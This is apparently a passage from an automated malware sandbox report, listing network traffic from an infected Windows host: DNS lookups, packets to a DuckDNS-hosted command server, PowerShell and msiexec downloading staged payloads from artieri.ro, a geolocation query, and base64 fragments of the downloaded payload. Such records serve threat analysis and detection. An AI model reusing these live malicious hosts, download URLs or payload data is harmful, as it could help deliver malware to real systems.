                                                            Oct 18, 2024 12:40:06.593905926 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.593952894 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.609930992 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.610157013 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.610172987 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.610189915 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.610204935 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.610213041 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.610220909 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.610234976 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.610238075 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.610243082 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.610275984 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.610462904 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.610479116 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.610493898 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.610522985 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.645936012 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.646095991 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.646111012 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.646125078 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.646178961 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.646193027 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.646195889 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.646210909 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.646248102 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.646267891 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.646342993 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.646357059 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.646384001 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.646397114 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.649445057 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.649491072 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.649550915 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.649585009 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.649609089 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.649637938 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.649662018 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.649676085 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.649698973 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.649806023 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.649820089 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.649832964 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.649838924 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.649869919 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.650022030 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.650037050 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.650052071 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.650079966 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.650193930 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.653945923 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.709409952 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.709553957 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.709568977 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.709610939 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.725635052 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.725775957 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.725790977 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.725852966 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.725868940 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.725869894 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.725924969 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:06.726020098 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.726032972 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:06.726083994 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:10.348001003 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:10.353059053 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.353085995 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.353112936 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:10.353135109 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:10.353141069 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.353153944 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.353178978 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.353185892 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:10.353190899 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.353220940 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.353233099 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.353255033 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.353306055 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.359299898 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.359324932 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.359348059 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.359360933 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.359462023 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.359473944 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.359652042 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.416584969 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:10.422590971 CEST5384849743193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:10.422636986 CEST4974353848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:19.863208055 CEST5384849742193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:19.865261078 CEST4974253848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:19.871731043 CEST5384849742193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:49.901657104 CEST5384849742193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:49.904174089 CEST4974253848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:49.909293890 CEST5384849742193.187.91.216192.168.2.4
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 18, 2024 12:39:06.875776052 CEST5936353192.168.2.41.1.1.1
                                                            Oct 18, 2024 12:39:06.909276009 CEST53593631.1.1.1192.168.2.4
                                                            Oct 18, 2024 12:39:59.268448114 CEST6422653192.168.2.41.1.1.1
                                                            Oct 18, 2024 12:39:59.384180069 CEST53642261.1.1.1192.168.2.4
                                                            Oct 18, 2024 12:40:01.760371923 CEST6117853192.168.2.41.1.1.1
                                                            Oct 18, 2024 12:40:01.767580032 CEST53611781.1.1.1192.168.2.4
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Oct 18, 2024 12:39:06.875776052 CEST192.168.2.41.1.1.10x80baStandard query (0)artieri.roA (IP address)IN (0x0001)false
                                                            Oct 18, 2024 12:39:59.268448114 CEST192.168.2.41.1.1.10xbf5dStandard query (0)renajazinw.duckdns.orgA (IP address)IN (0x0001)false
                                                            Oct 18, 2024 12:40:01.760371923 CEST192.168.2.41.1.1.10x26a9Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Oct 18, 2024 12:39:06.909276009 CEST1.1.1.1192.168.2.40x80baNo error (0)artieri.ro89.44.138.129A (IP address)IN (0x0001)false
                                                            Oct 18, 2024 12:39:59.384180069 CEST1.1.1.1192.168.2.40xbf5dNo error (0)renajazinw.duckdns.org193.187.91.216A (IP address)IN (0x0001)false
                                                            Oct 18, 2024 12:40:01.767580032 CEST1.1.1.1192.168.2.40x26a9No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                            • artieri.ro
                                                            • geoplugin.net
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.44973089.44.138.129801188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 18, 2024 12:39:06.919449091 CEST169OUTGET /l/Squirtish.toc HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                            Host: artieri.ro
                                                            Connection: Keep-Alive
                                                            Oct 18, 2024 12:39:07.840173960 CEST945INHTTP/1.1 301 Moved Permanently
                                                            Connection: Keep-Alive
                                                            Keep-Alive: timeout=5, max=100
                                                            content-type: text/html
                                                            content-length: 707
                                                            date: Fri, 18 Oct 2024 10:39:07 GMT
                                                            server: LiteSpeed
                                                            location: https://artieri.ro/l/Squirtish.toc
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.44973889.44.138.129805544C:\Windows\SysWOW64\msiexec.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 18, 2024 12:39:46.288026094 CEST166OUTGET /l/MhRliPwcjA146.bin HTTP/1.1
                                                            User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                            Host: artieri.ro
                                                            Cache-Control: no-cache
                                                            Oct 18, 2024 12:39:47.168879986 CEST949INHTTP/1.1 301 Moved Permanently
                                                            Connection: Keep-Alive
                                                            Keep-Alive: timeout=5, max=100
                                                            content-type: text/html
                                                            content-length: 707
                                                            date: Fri, 18 Oct 2024 10:39:47 GMT
                                                            server: LiteSpeed
                                                            location: https://artieri.ro/l/MhRliPwcjA146.bin
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                            Oct 18, 2024 12:39:51.903846025 CEST166OUTGET /l/MhRliPwcjA146.bin HTTP/1.1
                                                            User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                            Host: artieri.ro
                                                            Cache-Control: no-cache
                                                            Oct 18, 2024 12:39:52.173054934 CEST949INHTTP/1.1 301 Moved Permanently
                                                            Connection: Keep-Alive
                                                            Keep-Alive: timeout=5, max=100
                                                            content-type: text/html
                                                            content-length: 707
                                                            date: Fri, 18 Oct 2024 10:39:52 GMT
                                                            server: LiteSpeed
                                                            location: https://artieri.ro/l/MhRliPwcjA146.bin
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.449749178.237.33.50805544C:\Windows\SysWOW64\msiexec.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 18, 2024 12:40:01.774005890 CEST71OUTGET /json.gp HTTP/1.1
                                                            Host: geoplugin.net
                                                            Cache-Control: no-cache
                                                            Oct 18, 2024 12:40:02.618346930 CEST1164INHTTP/1.1 200 OK
                                                            date: Fri, 18 Oct 2024 10:40:02 GMT
                                                            server: Apache
                                                            content-length: 956
                                                            content-type: application/json; charset=utf-8
                                                            cache-control: public, max-age=300
                                                            access-control-allow-origin: *
                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c [TRUNCATED]
                                                            Data Ascii: { "geoplugin_request":"155.94.241.186", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.44973189.44.138.1294431188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-18 10:39:08 UTC169OUTGET /l/Squirtish.toc HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                            Host: artieri.ro
                                                            Connection: Keep-Alive
                                                            2024-10-18 10:39:09 UTC404INHTTP/1.1 200 OK
                                                            Connection: close
                                                            content-type: application/octet-stream
                                                            last-modified: Fri, 18 Oct 2024 05:13:31 GMT
                                                            accept-ranges: bytes
                                                            content-length: 439096
                                                            date: Fri, 18 Oct 2024 10:39:08 GMT
                                                            server: LiteSpeed
                                                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                            2024-10-18 10:39:09 UTC16384INData Raw: 63 51 47 62 36 77 49 34 44 62 75 48 43 78 41 41 36 77 4a 42 74 65 73 43 55 7a 38 44 58 43 51 45 63 51 47 62 36 77 4c 33 49 4c 6c 58 59 33 51 36 36 77 49 66 57 2b 73 43 66 78 4b 42 38 54 6d 50 75 6b 44 72 41 6e 2b 49 36 77 4c 2b 34 34 48 70 62 75 7a 4f 65 6e 45 42 6d 2b 73 43 2b 62 72 72 41 74 41 56 36 77 4c 50 49 62 71 6c 52 38 6d 49 63 51 47 62 63 51 47 62 63 51 47 62 36 77 4a 47 42 7a 48 4b 36 77 49 45 35 48 45 42 6d 34 6b 55 43 2b 73 43 4d 57 62 72 41 68 4d 6c 30 65 4c 72 41 6d 54 57 36 77 4c 69 4c 59 50 42 42 48 45 42 6d 33 45 42 6d 34 48 35 4f 5a 66 58 42 58 7a 4b 63 51 47 62 63 51 47 62 69 30 51 6b 42 48 45 42 6d 33 45 42 6d 34 6e 44 63 51 47 62 36 77 4a 5a 41 34 48 44 44 33 64 42 41 4f 73 43 69 46 64 78 41 5a 75 36 55 4c 71 69 4f 33 45 42 6d 33 45
                                                            Data Ascii: cQGb6wI4DbuHCxAA6wJBtesCUz8DXCQEcQGb6wL3ILlXY3Q66wIfW+sCfxKB8TmPukDrAn+I6wL+44HpbuzOenEBm+sC+brrAtAV6wLPIbqlR8mIcQGbcQGbcQGb6wJGBzHK6wIE5HEBm4kUC+sCMWbrAhMl0eLrAmTW6wLiLYPBBHEBm3EBm4H5OZfXBXzKcQGbcQGbi0QkBHEBm3EBm4nDcQGb6wJZA4HDD3dBAOsCiFdxAZu6ULqiO3EBm3E
                                                            2024-10-18 10:39:09 UTC16384INData Raw: 38 63 71 67 78 4c 39 4e 4e 4a 38 74 4c 75 53 4e 51 74 6b 61 69 4a 55 34 4e 58 4b 79 66 6a 45 45 62 65 65 78 59 2f 35 6b 2b 4d 31 4d 58 49 2b 53 7a 2b 46 52 6e 55 75 74 71 70 4c 50 75 70 33 4c 58 36 42 4f 58 73 79 2b 64 36 69 34 30 6f 4f 38 56 6a 62 46 62 48 47 52 36 68 64 4f 46 7a 37 4f 66 70 6f 73 56 66 51 77 49 35 4c 50 34 53 4f 53 7a 7a 69 63 62 71 4b 73 74 46 59 4d 51 61 37 44 53 77 4a 46 42 6f 77 78 5a 72 5a 54 56 30 45 74 71 36 50 72 44 51 75 64 49 71 53 49 41 70 56 39 54 67 2b 58 58 45 66 37 6f 6d 52 66 62 44 52 33 6d 46 36 31 75 4e 73 51 6f 6d 56 6c 50 43 30 75 54 68 59 66 5a 4e 57 73 63 51 35 47 41 79 71 6f 55 6f 63 61 51 4c 4c 6f 41 31 76 61 6f 78 32 4c 42 66 66 78 64 64 39 46 30 62 66 32 49 6e 6d 71 4b 62 36 69 66 4d 2f 78 49 35 4b 6e 31 6a 47
                                                            Data Ascii: 8cqgxL9NNJ8tLuSNQtkaiJU4NXKyfjEEbeexY/5k+M1MXI+Sz+FRnUutqpLPup3LX6BOXsy+d6i40oO8VjbFbHGR6hdOFz7OfposVfQwI5LP4SOSzzicbqKstFYMQa7DSwJFBowxZrZTV0Etq6PrDQudIqSIApV9Tg+XXEf7omRfbDR3mF61uNsQomVlPC0uThYfZNWscQ5GAyqoUocaQLLoA1vaox2LBffxdd9F0bf2InmqKb6ifM/xI5Kn1jG
                                                            2024-10-18 10:39:09 UTC16384INData Raw: 55 74 6a 56 35 38 6b 76 34 4f 30 67 72 5a 59 44 52 4b 58 6c 66 50 44 2b 54 39 33 42 6d 4c 67 6d 4b 6e 4b 71 39 48 6e 49 37 57 38 39 4e 6a 30 63 77 6e 76 65 57 48 32 39 65 6a 4d 54 62 57 7a 47 38 38 33 55 32 6a 6b 67 54 73 6e 32 49 6e 6b 71 76 78 4b 53 53 70 39 5a 39 30 6d 4e 45 67 34 69 32 63 6e 45 6c 31 6b 54 78 6d 46 47 32 53 2f 5a 4f 6d 74 55 78 48 45 4d 43 30 4d 70 55 47 46 6c 6c 74 58 2f 35 67 49 39 53 39 42 68 6d 6c 37 35 2f 61 4b 39 59 47 43 4d 37 49 52 6d 6b 6e 75 58 79 68 75 72 73 4a 68 65 37 6b 30 57 38 36 4a 6c 71 7a 64 4e 6a 30 34 57 34 43 48 4a 62 61 4a 56 57 61 64 74 37 70 35 39 71 6e 50 4f 32 4c 36 71 42 4a 49 35 35 4f 4f 30 69 4f 41 67 63 4d 61 42 45 61 54 2f 70 79 37 46 52 55 34 36 47 42 6e 6c 64 48 48 52 46 77 77 70 78 4f 48 32 66 47 63
                                                            Data Ascii: UtjV58kv4O0grZYDRKXlfPD+T93BmLgmKnKq9HnI7W89Nj0cwnveWH29ejMTbWzG883U2jkgTsn2InkqvxKSSp9Z90mNEg4i2cnEl1kTxmFG2S/ZOmtUxHEMC0MpUGFlltX/5gI9S9Bhml75/aK9YGCM7IRmknuXyhursJhe7k0W86JlqzdNj04W4CHJbaJVWadt7p59qnPO2L6qBJI55OO0iOAgcMaBEaT/py7FRU46GBnldHHRFwwpxOH2fGc
